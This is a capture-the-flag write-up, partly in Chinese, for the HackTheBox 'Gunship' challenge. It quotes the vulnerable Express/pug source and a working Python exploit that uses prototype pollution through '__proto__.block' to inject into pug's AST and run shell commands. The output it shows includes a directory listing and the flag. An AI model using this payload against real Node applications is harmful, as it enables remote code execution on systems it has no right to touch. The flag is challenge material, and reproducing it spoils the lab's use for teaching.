Gunship
CHALLENGE DESCRIPTION
VERY EASY
A city of lights, with retrofuturistic 80s peoples, and coffee, and drinks from another world... all the wooing in the world to make you feel more lonely... this ride ends here, with a tribute page of the British synthwave band called Gunship. 🎶
index.js
const express = require('express');
const app = express();
const routes = require('./routes');
const path = require('path');
app.use(express.json());
app.set('views','./views');
app.use('/static', express.static(path.resolve('static')));
app.use(routes);
app.all('*', (req, res) => {
return res.status(404).send('404 page not found');
});
app.listen(1337, () => console.log('Listening on port 1337'));
在页面底部发现一个输入框
根据 POST 发送的路由,定位到
challenge\routes\index.js
const path = require('path');
const express = require('express');
const pug = require('pug');
const {unflatten} = require('flat');
const router = express.Router();
router.get('/', (req, res) => {
return res.sendFile(path.resolve('views/index.html'));
});
router.post('/api/submit', (req, res) => {
const {artist} = unflatten(req.body);
if (artist.name.includes('Haigh') || artist.name.includes('Westaway') || artist.name.includes('Gingell')) {
return res.json({
'response': pug.compile('span Hello #{user}, thank you for letting us know!')({ user: 'guest' })
});
} else {
return res.json({
'response': 'Please provide us with the full name of an existing member.'
});
}
});
module.exports = router;
参考以下两个文章
- How AST Injection and Prototype Pollution Ignite Threats | by rayepeng | Medium
- 一文带你理解 AST Injection - 先知社区
编写攻击 exp
import requests
import base64
TARGET_URL = "http://94.237.56.248:50213"
command = "ls -lh"
print("Command: {}\n".format(command))
r = requests.post(
TARGET_URL + "/api/submit",
json={
"artist.name": "Haigh",
"__proto__.block": {
"type": "Text",
"line": "process.mainModule.require('child_process').execSync('$({command} | base64 > /app/static/out)')".format(command=command),
},
},
)
r = requests.get("http://94.237.56.248:50213/static/out").text
print(base64.b64decode(r).decode())
对网站进行交互
Command: ls -lh
total 56K
-rw-r--r-- 1 nobody nobody 56 Aug 13 2021 flagpJtu8
-rw-r--r-- 1 nobody nobody 441 Oct 9 2020 index.js
drwxr-xr-x 89 root root 4.0K Aug 13 2021 node_modules
-rw-r--r-- 1 nobody nobody 359 Oct 9 2020 package.json
drwxr-xr-x 2 nobody nobody 4.0K Aug 13 2021 routes
drwxr-xr-x 1 nobody nobody 4.0K Mar 11 11:25 static
drwxr-xr-x 2 nobody nobody 4.0K Aug 13 2021 views
-rw-r--r-- 1 nobody nobody 25.5K Oct 9 2020 yarn.lock
Command: cat flagpJtu8
HTB{wh3n_lif3_g1v3s_y0u_p6_st4rT_p0llut1ng_w1th_styl3!!}
Flag
HTB{wh3n_lif3_g1v3s_y0u_p6_st4rT_p0llut1ng_w1th_styl3!!}